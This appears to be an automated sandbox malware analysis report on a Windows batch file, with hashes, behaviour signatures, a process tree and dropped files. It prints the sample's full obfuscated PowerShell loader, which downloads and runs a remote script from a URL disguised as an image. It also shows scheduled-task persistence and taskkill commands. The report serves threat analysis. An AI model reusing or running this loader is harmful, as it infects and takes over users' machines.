Analysis
-
max time kernel
151s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
11-10-2022 21:41
Static task
static1
Behavioral task
behavioral1
Sample
OutPut2.bat
Resource
win7-20220812-en
General
-
Target
OutPut2.bat
-
Size
21KB
-
MD5
c32b1f1bb8eda7a1e148c1cdf014f23b
-
SHA1
af0cc28285fc57632751f970ba3040bb1af2faa0
-
SHA256
8a0dc53293a9c974b1884f315f724024713523a6cc95e5bb4abee5fdaf79a9b6
-
SHA512
f7d04d94d7dbabcf7aff4493745660efd65321c2d3e1c2a5c2fea4d02ecbcf90d77e322ef13d257ae263aadbd4cab6a4f237b349b8be0e3e30e3e31f6732980e
-
SSDEEP
96:VMzFOMzFJMzFLMzFeMzFzMzFJMzFTMzFiMzFJMzFLMzFUHQeMzFLMzF2MzFqMzFN:OVqYFQqwxqYgQFYNpdiohUPOzfXwQ9j
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1448 powershell.exe 6 1448 powershell.exe 8 1448 powershell.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1628 schtasks.exe 1220 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 2024 taskkill.exe 456 taskkill.exe 1684 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 1604 powershell.exe 1676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1448 powershell.exe Token: SeDebugPrivilege 456 taskkill.exe Token: SeDebugPrivilege 1684 taskkill.exe Token: SeDebugPrivilege 2024 taskkill.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2028 wrote to memory of 1744 2028 cmd.exe 29 PID 2028 wrote to memory of 1744 2028 cmd.exe 29 PID 2028 wrote to memory of 1744 2028 cmd.exe 29 PID 1744 wrote to memory of 1448 1744 cmd.exe 30 PID 1744 wrote to memory of 1448 1744 cmd.exe 30 PID 1744 wrote to memory of 1448 1744 cmd.exe 30 PID 1448 wrote to memory of 320 1448 powershell.exe 31 PID 1448 wrote to memory of 320 1448 powershell.exe 31 PID 1448 wrote to memory of 320 1448 powershell.exe 31 PID 320 wrote to memory of 1980 320 WScript.exe 32 PID 320 wrote to memory of 1980 320 WScript.exe 32 PID 320 wrote to memory of 1980 320 WScript.exe 32 PID 1980 wrote to memory of 1628 1980 cmd.exe 34 PID 1980 wrote to memory of 1628 1980 cmd.exe 34 PID 1980 wrote to memory of 1628 1980 cmd.exe 34 PID 1980 wrote to memory of 1220 1980 cmd.exe 35 PID 1980 wrote to memory of 1220 1980 cmd.exe 35 PID 1980 wrote to memory of 1220 1980 cmd.exe 35 PID 1980 wrote to memory of 456 1980 cmd.exe 36 PID 1980 wrote to memory of 456 1980 cmd.exe 36 PID 1980 wrote to memory of 456 1980 cmd.exe 36 PID 1980 wrote to memory of 1684 1980 cmd.exe 38 PID 1980 wrote to memory of 1684 1980 cmd.exe 38 PID 1980 wrote to memory of 1684 1980 cmd.exe 38 PID 1980 wrote to memory of 2024 1980 cmd.exe 39 PID 1980 wrote to memory of 2024 1980 cmd.exe 39 PID 1980 wrote to memory of 2024 1980 cmd.exe 39 PID 780 wrote to memory of 1920 780 taskeng.exe 41 PID 780 wrote to memory of 1920 780 taskeng.exe 41 PID 780 wrote to memory of 1920 780 taskeng.exe 41 PID 1920 wrote to memory of 940 1920 WScript.exe 42 PID 1920 wrote to memory of 940 1920 WScript.exe 42 PID 1920 wrote to memory of 940 1920 WScript.exe 42 PID 780 wrote to memory of 1444 780 taskeng.exe 45 PID 780 wrote to memory of 1444 780 taskeng.exe 45 PID 780 wrote to memory of 1444 780 taskeng.exe 45 PID 1444 wrote to memory of 1448 1444 WScript.exe 46 PID 1444 wrote to memory of 1448 1444 WScript.exe 46 PID 1444 wrote to memory of 1448 1444 WScript.exe 46 PID 1448 wrote to memory of 1676 1448 cmd.exe 48 PID 1448 wrote to memory of 1676 1448 cmd.exe 48 PID 1448 wrote to memory of 1676 1448 cmd.exe 48
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\OutPut2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\cmd.exeCMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)2⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81='IEX(NEW-OBJECT NET.W';$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450='EBCLIENT).DOWNLO';[BYTE[]];$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E='E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9(''https://pbc.kz/wp-admin/bb.jpg'')'.REPLACE('E01A3094C19277D49A6167D38BD16509408894085F963292E52959632654300649B8544BADBC2231987D9E0EB312E3E48EDE884708209E3843D0367D196268933D92623028FF5219F0CACD1372544251A248A5B35A2FA48806557553780AEC30BCD972F9','ADSTRING');[BYTE[]];IEX($8525E0FA70EEBAD1324BD331F92908DB43F4249A64E92444DD63FFB4AC9D79089FD1857C1207D14451056FF87436E6431B1BDAE2D5EB382B35171D284CC0DE3BDE282CE8667D74774D7CCCBE132B3968475695626E186D45FB2B7DE09626E90C92966E81+$6B520D490034728F7709E44F116D159A193300F11DFA9F40EA893256FBF7B8886072CD09D5DCE1EC12CA09EDE71F6DDE384A29B313E4EC1F117CC69B6783D14069D437329F1D3F670DAFC9A76335D8E8B7010C1164601FF8CDD713003C4D245B39DBD450+$4BF5260129FD327A8CDD2D9584D51B906D8066007252A3DD3B9A592E686CDF38D807A1305E7148C9BCF7E790A099A6272C6E2ACBA6A24333D289B67E1804C21249292A9C2A8703E87F3849D2033262DE904B3736A214EE10D056E178DFDC34D39279C45E)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\App\xx.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\System32\cmd.execmd /c ""C:\ProgramData\App\xx.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn App /sc minute /mo 5 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
PID:1628
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn det /sc minute /mo 1 /tr "C:\ProgramData\App\cAppc.vbs"6⤵
- Creates scheduled task(s)
PID:1220
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM schtasks.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:456
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM powershell.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM cmd.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4960EA12-69D3-4B98-B5D4-F5B8F661988D} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\cmd.execmd /c ""C:\ProgramData\App\cAppc.bat" "3⤵PID:940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS14⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\ProgramData\App\cAppc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\cmd.execmd /c ""C:\ProgramData\App\cAppc.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\App\App.PS14⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
264KB
MD5b385ec653fef60833ca284dcfff71bff
SHA1612981ecf896a7ef09496894d8059f6a9570cf2a
SHA25676a4b8b505e22defbbd1ba2b577bafe4c4311d2d329f3d29cf3e804a7dd191e8
SHA51200f9155acd9aa8fb82c051fb4a27ee5e5b35229f69e0a20525dbcd85c2bf74025b7cc5608e1680683c4959ebfb4ad90811e006bed63e66acd6f1755005c9ba81
-
Filesize
81B
MD56d2d36c3cc7bea993801e5febf7db1c8
SHA1962ca57c247334f79d40e55aa30612c5dfe96c12
SHA25683c47147832482038f4ac9867d5b16ccb78640d9b39d0860805b25db86609a68
SHA512751d5f167617c427697343895988e5b036eff7ee8c358ba35d764378a928b813ee798b5c2e0f67a8dac4622fd5c61708ab0823f9f1498e7d07db4bfe9f466c5d
-
Filesize
5KB
MD55392a92ca835d8812a79a1ee6dac0892
SHA1cb56f654f054542c538f492c4d437d65e4f9bba7
SHA2564ab24fc3a3b34b6b7b57d5fbffba6831ed4c7a9c5c31bfd97aeb603d6bd5f2c5
SHA51202175ebd71040d878818dadb2dda855ddc9a43b1dcd625c1943bedc09b3cba48e4debd7b2401025bc992c0ca38dc96e3f2746fe1518808290c2b07132470829d
-
Filesize
260B
MD515b09a88be68cc160232d8766f7e3be7
SHA1b3468aaafd099c639405574b719a201b8df00b02
SHA256d7128567b26c84039b6fd667ab0d1a443dbbdf15e0550a26e015cbab95979ae2
SHA5120cd81076a2242363bd692b12287ac31e35332b272bd1ded78d9dbd55cee3c8947cce3f45cc4b24bb6c303032d2dfb6efe87edff49fa242b4013e56eaa1cd0460
-
Filesize
4KB
MD51de9b452f5231a8281209d61a101bcb5
SHA127ea6c5470a58226b7a1ab8986d3d0bec87ae3eb
SHA2560920a4adad558df5820ab49ab8566d9dbea771da520a754c2652fa5548852f64
SHA512e22f70de118f0b6b53e1277ee1c07f30e9d7356db36d858025725b1b0ee2cd677ac926fcb5587243fb342ef7fcff498a68eb6d8ebef3497b5c450468f0d7c4ec
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5adca19c2d935622e6a96998c8103fc4b
SHA1e50d9fb1bd709ce58d87278bd3887e2cadbb73c6
SHA256f18bcce62919fb49d9720b6ceede99449757e0adef5e9d3f18e58631cf23c166
SHA5123567d9a82a068252c2cd92d965fb092b638c72abdeaa80021a72e173eca4789417113780f4fcf0b44f9f676b243e0d6042db0acb576c387bcdaf32386a021c0d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5922e2142ca596c3b35efebf1082ac830
SHA12a9fe1438e01736d37d5036b85c4a99224e32c71
SHA2568ec919e95012c559abc44bf12490292e0cddeacaca25488f451eb6e76368c469
SHA512972313ea3ab6b2f4252b5f9220cd6d6c473d49e75e45120b2a72fe8668d5152ef4638e786f307f945630727d129a036e5fe267aa9b0f3c5d0f5071c9bb7c4fd0